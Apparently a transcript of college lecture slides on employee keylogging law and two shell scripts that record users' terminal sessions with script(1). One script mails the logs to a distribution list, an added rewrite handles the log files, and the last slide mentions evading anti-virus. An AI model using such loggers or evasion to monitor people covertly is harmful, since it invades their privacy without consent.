Creating a keystroke logger in unix shell scripting

CIS 216 Dan Morrill Highline Community College Creating a Keystroke Logger in Unix Shell Scripting

Description: two examples of keystroke loggers in Linux (Ubuntu).

Transcript of Creating a keystroke logger in unix shell scripting

Page 1: Creating a keystroke logger in unix shell scripting

CIS 216

Dan Morrill

Highline Community College

Creating a Keystroke Logger in Unix Shell Scripting

Page 2: Why would I want a Keystroke Logger?

While most companies purchase software to do keystroke logging, a system admin will sometimes be asked to record the keystrokes of an employee, based on a court order or on a request/order from the legal department or another party in the company.

Keystroke Loggers are Illegal? Not Necessarily – companies can and often do keystroke log their employees.

"Courts in some jurisdictions have declined to take the step to prohibit the surreptitious use of keyloggers, despite the apparent option to apply state legislation. This posture leaves individuals vulnerable to having their private information exploited by their employers. Given alternative methods of surveillance, lack of federal regulation, and advancing technology, extending state statutes is necessary and just." (Harvard Law, 2012)

Page 3: Employers do this

"Keylogging - Employers sometimes install keylogging programs that record every single keystroke you use on your computer. This allows them to see everything you are typing, including your passwords. The Stored Communication Act and Federal Wiretap Act, along with some state laws may offer limited protection, but so far most employers are getting away with this intrusive practice.

Email monitoring - Many companies have written policies saying the company can monitor your email. That means that they may look at your personal emails sent on company computers and devices, even if you used your personal email address.

Website monitoring - Your employer is almost certainly monitoring your internet usage. That means if you're checking out porn sites, visiting YouTube, updating Facebook, or doing your holiday shopping, your employer will know about it. You may be violating a company Internet usage policy. If you aren't working the hours you're paid for, the employer may well discipline you for your Internet usage." (AOL, 2012)

Page 4: But what about my Right to Privacy?

"The Fourth Amendment applies whenever the government — whether local, state or federal — conducts a search or seizure. It protects you from an unreasonable search or seizure by any government official or agent, not just the police.

The Fourth Amendment does not protect you from privacy invasions by people other than the government, even if they later hand over what they found to the government — unless the government directed them to search your things in the first place." (EFF, 2006)

Page 5: How do Keyloggers Work?

"The most common methods used to construct keylogging software are as follows:

- A system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C);

- A cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState – most often written in Visual Basic, sometimes in Borland Delphi);

- Using a filter driver (requires specialized knowledge and is written in C)." (SecureList, 2007)

Page 6: A quick keylogger (Example A)

Declare the variables:

    log_dir=/home/                        # Declared on the slide; not used by the functions that follow
    current_user=$(whoami)                # User whose session is recorded
    log_time=$(date +%m%d%y%H%M%S)        # Timestamp that makes the log name unique
    log_file="$current_user$log_time"     # Log name: <user><timestamp>
    attempt="0"                           # Collision counter used by create_log
    test_log_file="$log_file"             # Candidate name tried by create_log

Page 7: A quick keylogger (Example A)

Write the function:

    create_log()
    {
        while [ -e "$test_log_file" ]     # Checks for an existing file with the name found in $log_file.
        do                                # If $log_file is found, increment by one and try again.
            attempt=$((attempt + 1))
            test_log_file="${log_file}_$attempt"
        done
        log_file="$test_log_file"
        touch "$log_file"                 # Once a viable filename has been found, this file is created.
        chmod 600 "$log_file"             # Make $log_file writable for logging (owner only).
    }

Page 8: A quick keylogger (Example A)

Do the work:

    close_log()
    {
        if [ -e "$log_file" ]             # Tests for the existence of $log_file.
        then
            echo "" >> "$log_file"
            echo "****************************************" >> "$log_file"
            echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> "$log_file"   # Adds final date/time entry to log
        else
            echo "Test 3b"                # Debug marker
            echo "Logfile did not exist. No record of keystroke logging exists." >> "$log_file"   # If log does not exist, creates log and logs failure
            echo "Created $log_file to report this error." >> "$log_file"
            echo "Logfile created at $(date +%m%d%y%H%M%S)." >> "$log_file"
            echo "Logfile will now close."
        fi
        chmod 400 "$log_file"             # Guarantees log is left in read-only mode, even if trap triggered during logging.
        kill -9 $$ > /dev/null 2>&1       # Guarantees ending of this process (the script's own PID).
    }

Page 9: A quick keylogger (Example A)

Trap the user's input and create the log:

    trap 'close_log; exit 0' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26   # On any trappable signal, close the log and exit (9 and 19 cannot be caught)
    create_log
    script "$log_file"                    # Records everything typed in the subshell until it exits
    close_log
    exit

Page 10: A quick keylogger (Example B)

Setup reporting via e-mail as a distro list:

    LOG_MANAGER="logman"     # List to e-mail audit log

logman is the distribution e-mail list.

Page 11: A quick keylogger (Example B)

Setup the cleanup routine so no logs are left behind on the system being monitored:

    cleanup_exit ()  # This will do the cleanup execute and exit function.
    {
        # This function is executed on any type of exit except of course
        # a kill -9, which cannot be trapped. The script log file is
        # e-mailed either locally or remotely and the log file is
        # compressed. The last "exit" is needed so the user does not
        # have the ability to get to the command line without logging.

        if [[ -s ${LOGDIR}/${LOGFILE} ]]
        then
            mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER \
                < ${LOGDIR}/${LOGFILE}
            compress ${LOGDIR}/${LOGFILE} 2>/dev/null
        fi

        exit
    }

Page 12: A quick keylogger (Example B)

Set the exit trap:

    trap 'cleanup_exit' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26

Page 13: A quick keylogger (Example B)

Declare the variables:

    TS=$(date +%m%d%y%H%M%S)                   # File time stamp
    THISHOST=$(hostname|cut -f1-2 -d.)         # This is the host name of this machine
    LOGDIR=/home/ganesh/other/logger_files     # This is the path that holds the logs
    LOGFILE=${THISHOST}.${LOGNAME}.$TS         # Creates the name of the log file
    touch $LOGDIR/$LOGFILE                     # Creates the actual file
    set -o vi 2>/dev/null                      # Previous commands recall

    # Set the command prompt
    export PS1="[$THISHOST]@"'$PWD> '

Page 14: A quick keylogger (Example B)

Running parameters:

    chmod 774 ${LOGDIR}/${LOGFILE}     # Read, write and execute for the owner and group; read-only for others

    script ${LOGDIR}/${LOGFILE}        # Start the script monitoring session

    chmod 774 ${LOGDIR}/${LOGFILE}     # Reapply the same permissions after the session ends

    cleanup_exit                       # Execute the cleanup and exit function
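Both examples build the same three-step procedure (name and create a log, arm a trap, run script(1) and close the log out). The block below is an added example, not code from the slides: it redoes those steps in POSIX sh so that the log is created atomically under noclobber with 0600 permissions, the collision counter is real arithmetic, and the close-out runs from the trap; record_session and the helper names are my own.

```shell
#!/bin/sh
# Added example, not the slides' own code: the log-creation and close-out
# steps of Examples A and B redone so the file is created atomically with
# 0600 permissions and the collision counter is a real integer.

# Create a unique, timestamped log under $1 for user $2 and print its path.
# set -C (noclobber) makes the redirection fail if the name already exists,
# so there is no test-then-touch window and a pre-placed file or symlink
# with the same name is never opened for writing.
make_log_file() {
    log_dir=$1
    user=$2
    base="$log_dir/${user}_$(date +%m%d%y%H%M%S)"
    candidate=$base
    attempt=0
    old_umask=$(umask)
    umask 077                               # file is 0600 from creation on
    while ! ( set -C; : > "$candidate" ) 2>/dev/null; do
        attempt=$((attempt + 1))            # arithmetic, not the string "0+1"
        [ "$attempt" -lt 1000 ] || { umask "$old_umask"; return 1; }
        candidate="${base}_$attempt"
    done
    umask "$old_umask"
    printf '%s\n' "$candidate"
}

# Append the closing banner and leave the log read-only, as close_log does.
finalize_log() {
    [ -f "$1" ] || return 1
    {
        echo ""
        echo "****************************************"
        echo "Logfile closing at $(date +%m%d%y%H%M%S)."
    } >> "$1"
    chmod 400 "$1"
}

# Record one interactive session: create the log, arm the trap so the log is
# still closed out if the shell is signalled, then run script(1).
record_session() {
    log=$(make_log_file "$1" "$(whoami)") || return 1
    trap 'finalize_log "$log"; exit 0' HUP INT QUIT TERM
    script "$log"                           # returns when the recorded shell exits
    finalize_log "$log"
}
```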

Page 15: There is always more than one solution

Sometimes you need to write a key logger that is required for work, and you will not want to trigger an anti-virus/malware response.

Be careful – this is pretty cool, but it leads to liability work if not sufficiently covered by authorization from management.

Questions?